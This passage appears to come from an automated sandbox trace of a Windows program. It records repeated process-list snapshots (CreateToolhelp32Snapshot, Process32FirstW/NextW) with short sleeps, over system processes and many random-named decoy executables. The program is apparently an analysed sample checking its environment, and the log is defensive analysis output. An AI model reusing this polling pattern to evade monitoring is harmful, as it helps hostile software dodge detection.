lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0116.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0116.244] CloseHandle (hObject=0xbc) returned 1 [0116.244] Sleep (dwMilliseconds=0x12c) [0116.559] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0116.565] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.566] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0116.567] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0116.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0116.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0116.571] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0116.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0116.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0116.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.574] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0116.577] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.579] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0116.580] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.583] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0116.584] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0116.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0116.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.588] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.589] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0116.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0116.592] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0116.593] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0116.594] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0116.595] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0116.597] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0116.598] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0116.599] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0116.600] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0116.601] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0116.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.710] CloseHandle (hObject=0xc4) returned 1 [0116.710] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.717] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0116.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0116.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0116.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0116.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0116.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0116.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0116.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.800] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0116.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.803] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0116.804] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.805] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.806] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0116.807] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0116.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0116.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0116.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight 